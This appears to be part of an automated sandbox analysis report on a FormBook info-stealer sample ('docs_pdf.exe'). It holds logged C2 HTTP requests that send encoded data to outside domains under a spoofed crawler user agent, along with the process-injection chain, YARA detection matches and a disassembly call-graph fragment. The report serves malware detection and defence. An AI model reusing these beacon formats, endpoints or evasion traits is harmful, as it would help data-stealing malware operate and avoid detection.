                                                          Jul 13, 2024 00:05:53.325402975 CEST1236INData Raw: 1f 5d 43 5c f8 8a 4f 20 5d 85 ca e9 d2 f7 aa 2a 57 ac 42 34 42 b6 70 3b 8f 35 53 d1 75 30 64 6a cf c0 70 ba f5 66 77 7f b0 0d a8 22 ab d6 d1 b8 63 1f 29 eb 8a 55 87 06 3d e5 74 94 f6 1b 73 a3 b4 97 39 5c 4b b1 e3 42 b0 d0 9e d2 b4 23 ef 6c b1 6b
                                                          Data Ascii: ]C\O ]*WB4Bp;5Su0djpfw"c)U=ts9\KB#lkHuP<{4+wywQ00{c9:!k]qp8NvgmRVKTO3j+3y9GxyWcNQ L{[]R'j?-#oO?5!]^A{rX&Va
                                                          Jul 13, 2024 00:05:53.332982063 CEST1236INData Raw: 27 9a 7a ff b7 62 89 a6 c8 9a f2 ce 86 3d b1 43 97 d5 93 26 9f d9 d1 10 bd 58 1c ba 26 ed 79 f4 0e f1 94 f7 d3 cd cd eb 0c 99 ae ae b4 82 43 19 1b 72 85 14 72 c3 62 ec b9 e3 53 8a 2c 53 bc 10 00 c3 1e c3 a7 86 b4 48 15 ae e2 69 00 21 28 b5 e8 e3
                                                          Data Ascii: 'zb=C&X&yCrrbS,SHi!(^sqa(W$2tigF%,5KYMb$jcbw9;#bTmzsr>IuT-k~m_w{S#u(Ze!68:(Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          52192.168.2.6497765.78.41.174805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:05:54.908226013 CEST468OUTGET /6rlx/?D0Pts04=Q2ZAF+B5MPpYnKblwTws72s1FRS0QoBZYrcwSpUNeInn+zCIhLxwZygB7Wu/ELLY+MlDUKKO21LBMLVVY53W3Ctkqsy7izJexcMbesSkfCBVyo5K3pGetYj3FpCs5hqCFg/EaJo=&Q8s=tdcd5h7ptjmdxx HTTP/1.1
                                                          Host: www.411divorce.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Jul 13, 2024 00:05:55.732801914 CEST1007INHTTP/1.1 301 Moved Permanently
                                                          Date: Fri, 12 Jul 2024 22:05:55 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: public, no-cache
                                                          X-Redirect-By: WordPress
                                                          Location: http://411divorce.com/6rlx/?D0Pts04=Q2ZAF+B5MPpYnKblwTws72s1FRS0QoBZYrcwSpUNeInn+zCIhLxwZygB7Wu/ELLY+MlDUKKO21LBMLVVY53W3Ctkqsy7izJexcMbesSkfCBVyo5K3pGetYj3FpCs5hqCFg/EaJo=&Q8s=tdcd5h7ptjmdxx
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          Server: Prometheus
                                                          Pre-Cognitive-Push: Enabled
                                                          Quantum-Flux-Capacity: Omega
                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                          X-Grid-SRCache-TTL: 2592000
                                                          X-Grid-SRCache-Skip: -query_string
                                                          X-Grid-SRCache-Fetch: BYPASS
                                                          X-Grid-SRCache-Store: BYPASS
                                                          Data Raw: 62 62 0d 0a 0a 3c 21 2d 2d 43 61 63 68 65 64 20 75 73 69 6e 67 20 4e 67 69 6e 78 2d 48 65 6c 70 65 72 20 6f 6e 20 32 30 32 34 2d 30 37 2d 31 32 20 31 37 3a 30 35 3a 35 35 2e 20 49 74 20 74 6f 6f 6b 20 35 34 20 71 75 65 72 69 65 73 20 65 78 65 63 75 74 65 64 20 69 6e 20 30 2e 32 31 32 20 73 65 63 6f 6e 64 73 2e 2d 2d 3e 0a 3c 21 2d 2d 56 69 73 69 74 20 68 74 74 70 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 65 78 74 65 6e 64 2f 70 6c 75 67 69 6e 73 2f 6e 67 69 6e 78 2d 68 65 6c 70 65 72 2f 66 61 71 2f 20 66 6f 72 20 6d 6f 72 65 20 64 65 74 61 69 6c 73 2d 2d 3e 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: bb...Cached using Nginx-Helper on 2024-07-12 17:05:55. It took 54 queries executed in 0.212 seconds.-->...Visit http://wordpress.org/extend/plugins/nginx-helper/faq/ for more details-->0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          53192.168.2.64977764.46.102.70805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:06:01.362500906 CEST719OUTPOST /aiec/ HTTP/1.1
                                                          Host: www.sgbet777.org
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.sgbet777.org
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 212
                                                          Referer: http://www.sgbet777.org/aiec/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 54 6d 37 52 46 41 35 4a 38 75 43 46 4e 6f 37 34 51 35 34 70 6e 64 34 6c 79 36 2f 6a 65 48 63 50 6b 64 38 42 50 65 41 4f 72 63 42 71 4f 32 52 65 58 34 7a 4a 6d 39 57 76 58 50 43 59 44 48 4c 78 33 79 58 47 76 33 55 67 65 43 57 70 37 38 63 65 2f 2f 47 63 32 4d 55 48 65 64 74 33 79 57 44 49 4a 52 46 4e 37 6a 33 67 59 61 4c 75 4f 36 78 57 30 33 78 6b 76 4c 75 49 56 76 59 4b 67 6f 73 69 43 34 4f 71 42 35 51 6a 62 6a 38 31 50 46 39 56 44 55 32 34 31 53 35 54 48 73 66 59 6b 30 54 34 6f 43 48 58 2b 50 35 50 75 76 52 37 41 4d 35 36 52 32 68 54 51 58 4c 68 6c 6c 30 52 49 45 43 31 58 47 4b 52 5a 70 50 71 34 43 48 6a
                                                          Data Ascii: D0Pts04=Tm7RFA5J8uCFNo74Q54pnd4ly6/jeHcPkd8BPeAOrcBqO2ReX4zJm9WvXPCYDHLx3yXGv3UgeCWp78ce//Gc2MUHedt3yWDIJRFN7j3gYaLuO6xW03xkvLuIVvYKgosiC4OqB5Qjbj81PF9VDU241S5THsfYk0T4oCHX+P5PuvR7AM56R2hTQXLhll0RIEC1XGKRZpPq4CHj
                                                          Jul 13, 2024 00:06:01.812640905 CEST479INHTTP/1.1 404 Not Found
                                                          Date: Fri, 12 Jul 2024 22:06:01 GMT
                                                          Server: Apache
                                                          Content-Length: 315
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          54192.168.2.64977864.46.102.7080
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:06:04.452641964 CEST743OUTPOST /aiec/ HTTP/1.1
                                                          Host: www.sgbet777.org
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.sgbet777.org
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 236
                                                          Referer: http://www.sgbet777.org/aiec/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 54 6d 37 52 46 41 35 4a 38 75 43 46 4d 4c 7a 34 44 4f 45 70 79 4e 34 6b 72 36 2f 6a 4a 58 63 4c 6b 64 77 42 50 61 59 6e 72 75 6c 71 4e 58 68 65 57 36 4c 4a 68 39 57 76 63 76 43 64 4f 6e 4c 4d 33 79 54 34 76 32 34 67 65 44 79 70 37 34 51 65 34 4f 47 62 33 63 55 46 4c 74 74 31 38 32 44 49 4a 52 46 4e 37 6a 6a 4b 59 63 6a 75 4f 4b 42 57 6c 6a 6c 6a 68 72 75 50 43 66 59 4b 6b 6f 73 6d 43 34 50 39 42 37 6b 4a 62 6d 34 31 50 41 52 56 44 46 32 37 37 53 35 4a 4b 4d 65 45 74 31 4b 41 77 6b 4b 79 77 73 38 69 36 39 34 62 49 61 34 67 4e 46 68 77 43 48 72 6a 6c 6e 73 6a 49 6b 43 66 56 47 79 52 4c 2b 44 4e 33 32 69 41 47 45 73 54 76 64 4b 64 32 49 48 75 59 61 6b 6c 35 47 53 6a 71 77 3d 3d
                                                          Data Ascii: D0Pts04=Tm7RFA5J8uCFMLz4DOEpyN4kr6/jJXcLkdwBPaYnrulqNXheW6LJh9WvcvCdOnLM3yT4v24geDyp74Qe4OGb3cUFLtt182DIJRFN7jjKYcjuOKBWljljhruPCfYKkosmC4P9B7kJbm41PARVDF277S5JKMeEt1KAwkKyws8i694bIa4gNFhwCHrjlnsjIkCfVGyRL+DN32iAGEsTvdKd2IHuYakl5GSjqw==
                                                          Jul 13, 2024 00:06:04.908385992 CEST479INHTTP/1.1 404 Not Found
                                                          Date: Fri, 12 Jul 2024 22:06:04 GMT
                                                          Server: Apache
                                                          Content-Length: 315
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          55192.168.2.64977964.46.102.7080
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:06:06.983510017 CEST1756OUTPOST /aiec/ HTTP/1.1
                                                          Host: www.sgbet777.org
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.sgbet777.org
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1248
                                                          Referer: http://www.sgbet777.org/aiec/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 54 6d 37 52 46 41 35 4a 38 75 43 46 4d 4c 7a 34 44 4f 45 70 79 4e 34 6b 72 36 2f 6a 4a 58 63 4c 6b 64 77 42 50 61 59 6e 72 75 74 71 4e 6c 70 65 58 62 4c 4a 67 39 57 76 43 66 43 63 4f 6e 4c 64 33 32 2f 6b 76 33 45 77 65 42 36 70 36 62 59 65 39 36 71 62 38 63 55 46 55 39 74 32 79 57 44 64 4a 52 56 42 37 6a 7a 4b 59 63 6a 75 4f 49 5a 57 31 48 78 6a 73 4c 75 49 56 76 59 38 67 6f 73 4f 43 34 47 49 42 37 78 2b 62 53 4d 31 50 6b 78 56 42 7a 4b 37 7a 53 35 58 50 4d 65 4d 74 31 32 66 77 69 75 59 77 76 68 35 36 39 4d 62 59 75 74 48 52 78 52 47 41 55 72 35 6c 6d 4d 7a 49 51 47 75 55 48 75 5a 41 74 66 5a 39 48 65 30 66 79 73 51 75 65 54 6b 2f 2b 37 65 5a 4e 4a 39 74 55 58 74 34 64 79 42 6a 67 47 4a 4c 46 32 57 73 6d 7a 72 2b 56 6b 68 53 48 58 66 52 63 6c 48 61 7a 4c 69 72 45 48 37 57 2f 77 4b 67 56 2b 39 59 64 74 66 49 68 42 37 59 59 41 44 58 6e 32 38 63 68 33 38 71 6c 6d 4a 66 43 38 63 7a 41 56 63 75 6d 6f 4d 41 79 6f 57 45 39 5a 76 7a 79 42 58 71 6c 63 4c 63 79 4d 57 72 33 30 51 37 6f [TRUNCATED]
                                                          Data Ascii: D0Pts04=Tm7RFA5J8uCFMLz4DOEpyN4kr6/jJXcLkdwBPaYnrutqNlpeXbLJg9WvCfCcOnLd32/kv3EweB6p6bYe96qb8cUFU9t2yWDdJRVB7jzKYcjuOIZW1HxjsLuIVvY8gosOC4GIB7x+bSM1PkxVBzK7zS5XPMeMt12fwiuYwvh569MbYutHRxRGAUr5lmMzIQGuUHuZAtfZ9He0fysQueTk/+7eZNJ9tUXt4dyBjgGJLF2Wsmzr+VkhSHXfRclHazLirEH7W/wKgV+9YdtfIhB7YYADXn28ch38qlmJfC8czAVcumoMAyoWE9ZvzyBXqlcLcyMWr30Q7ohtmEWPjNkOzwIUlmQaqZLaXR121TBIWLGGu0+IOl4Yy5inRstNq/8T5KP24F5agw3rcWeN8HgBrhKAsy+lFi2Ozhov8YzXUm26qnRgfFXZNQbqr84nr2M5/6cMM9WVXJZWjoUO1AQYUgnbx2s2j8B0De/GjnTGCDce+Tyrx/G0KG++3s5d0O7FTzaMc3zNZgeUSB0c7AOSuoKBrSyeL+Dtr2mJPhlPUsKeY4Ww3U6n7BFrC9O+YmmfrfM8K+i09VioNNxqJI62haNiQL3ncl+desrTGSbH/kiAqiN8GtMm9YxcwEajnN4KtVEaQUpFOEKrGsODVVS/VXtg8dlms1cClTLH58zL1zCtu+pnbwK3zocMljU5hyGrPD6gT60EtZxayDoHTvD/QDICZqWbDZPoaccAlM7EWYnumRvRliw25C9akWTZsK40OYQXP/R0ArggWJj+tMuzjvOmz/PYAta0sALOKa8+XX4s5RmqT+9VrAL3j24Cs1SdBhMg13VbshZamgBxw9woOIfwa5l8PEjuLyK17y7tJyhZGAoGLv1tkHG2Cr+tSNH7S+r8DGGUEQPMa4e9NaIeA8xzW0TlElpZXsdheXeJATQz6ujfrg3cLc3Lz6oQnM99kLoJw8PjpIzeMsmr3GaQG/L2C+UBBM6Pvazc3LoP45qs [TRUNCATED]
                                                          Jul 13, 2024 00:06:07.433316946 CEST479INHTTP/1.1 404 Not Found
                                                          Date: Fri, 12 Jul 2024 22:06:07 GMT
                                                          Server: Apache
                                                          Content-Length: 315
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:18:01:55
                                                          Start date:12/07/2024
                                                          Path:C:\Users\user\Desktop\docs_pdf.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\docs_pdf.exe"
                                                          Imagebase:0xf0000
                                                          File size:1'193'984 bytes
                                                          MD5 hash:4A7D2FD983AA91D5D3B7BEC3C430A825
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:2
                                                          Start time:18:01:56
                                                          Start date:12/07/2024
                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\docs_pdf.exe"
                                                          Imagebase:0x970000
                                                          File size:46'504 bytes
                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2491417008.0000000003680000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2491417008.0000000003680000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2491132736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2491132736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2492038976.0000000004550000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2492038976.0000000004550000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:4
                                                          Start time:18:02:28
                                                          Start date:12/07/2024
                                                          Path:C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe"
                                                          Imagebase:0x80000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4551015645.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4551015645.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:high
                                                          Has exited:false

                                                          General

                                                          Target ID:5
                                                          Start time:18:02:29
                                                          Start date:12/07/2024
                                                          Path:C:\Windows\SysWOW64\isoburn.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\SysWOW64\isoburn.exe"
                                                          Imagebase:0xd10000
                                                          File size:107'008 bytes
                                                          MD5 hash:BF19DD525C7D23CAFC086E9CCB9C06C6
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4549278763.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4549278763.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4549521621.0000000000AC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4549521621.0000000000AC0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4549572273.0000000000B00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4549572273.0000000000B00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          Reputation:moderate
                                                          Has exited:false

                                                          General

                                                          Target ID:7
                                                          Start time:18:02:42
                                                          Start date:12/07/2024
                                                          Path:C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe"
                                                          Imagebase:0x80000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4553969990.0000000005210000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4553969990.0000000005210000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:high
                                                          Has exited:false

                                                          General

                                                          Target ID:10
                                                          Start time:18:02:54
                                                          Start date:12/07/2024
                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                          Imagebase:0x7ff728280000
                                                          File size:676'768 bytes
                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:4%
                                                            Dynamic/Decrypted Code Coverage:0.4%
                                                            Signature Coverage:3%
                                                            Total number of Nodes:2000
                                                            Total number of Limit Nodes:153
                                                            execution_graph 97944 fb56e 97951 10fb84 97944->97951 97946 fb584 97960 fc707 97946->97960 97948 fb5ac 97949 fa4e8 97948->97949 97972 15a0b5 89 API calls 4 library calls 97948->97972 97952 10fb90 97951->97952 97953 10fba2 97951->97953 97973 f9e9c 60 API calls Mailbox 97952->97973 97955 10fbd1 97953->97955 97956 10fba8 97953->97956 97984 f9e9c 60 API calls Mailbox 97955->97984 97974 110ff6 97956->97974 97959 10fb9a 97959->97946 97962 fc72c _wcscmp 97960->97962 98013 f7b76 97960->98013 97965 fc760 Mailbox 97962->97965 98018 f7f41 97962->98018 97965->97948 97969 131ad7 97971 131adb Mailbox 97969->97971 98032 f9e9c 60 API calls Mailbox 97969->98032 97971->97948 97972->97949 97973->97959 97978 110ffe 97974->97978 97976 111018 97976->97959 97978->97976 97979 11101c std::exception::exception 97978->97979 97985 11594c 97978->97985 98002 1135e1 DecodePointer 97978->98002 98003 1187db RaiseException 97979->98003 97981 111046 98004 118711 58 API calls _free 97981->98004 97983 111058 97983->97959 97984->97959 97986 1159c7 97985->97986 97999 115958 97985->97999 98011 1135e1 DecodePointer 97986->98011 97988 1159cd 98012 118d68 58 API calls __getptd_noexit 97988->98012 97991 11598b RtlAllocateHeap 97992 1159bf 97991->97992 97991->97999 97992->97978 97994 1159b3 98009 118d68 58 API calls __getptd_noexit 97994->98009 97998 115963 97998->97999 98005 11a3ab 58 API calls 2 library calls 97998->98005 98006 11a408 58 API calls 8 library calls 97998->98006 98007 1132df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97998->98007 97999->97991 97999->97994 97999->97998 98000 1159b1 97999->98000 98008 1135e1 DecodePointer 97999->98008 98010 118d68 58 API calls __getptd_noexit 98000->98010 98002->97978 98003->97981 98004->97983 98005->97998 98006->97998 98008->97999 98009->98000 98010->97992 98011->97988 98012->97992 98014 110ff6 Mailbox 59 API calls 98013->98014 98015 f7b9b 98014->98015 98033 f8189 98015->98033 98019 f7f50 __wsetenvp _memmove 98018->98019 98020 110ff6 Mailbox 59 API calls 98019->98020 98021 f7f8e 98020->98021 98022 f7c8e 98021->98022 98023 12f094 98022->98023 98024 f7ca0 98022->98024 98042 148123 59 API calls _memmove 98023->98042 98036 f7bb1 98024->98036 98027 f7cac 98031 f859a 68 API calls 98027->98031 98028 12f09e 98043 f81a7 98028->98043 98030 12f0a6 Mailbox 98031->97969 98032->97971 98034 110ff6 Mailbox 59 API calls 98033->98034 98035 f7baa 98034->98035 98035->97962 98037 f7bbf 98036->98037 98041 f7be5 _memmove 98036->98041 98038 110ff6 Mailbox 59 API calls 98037->98038 98037->98041 98039 f7c34 98038->98039 98040 110ff6 Mailbox 59 API calls 98039->98040 98040->98041 98041->98027 98042->98028 98044 f81ba 98043->98044 98045 f81b2 98043->98045 98044->98030 98047 f80d7 98045->98047 98048 f80fa _memmove 98047->98048 98049 f80e7 98047->98049 98048->98044 98049->98048 98050 110ff6 Mailbox 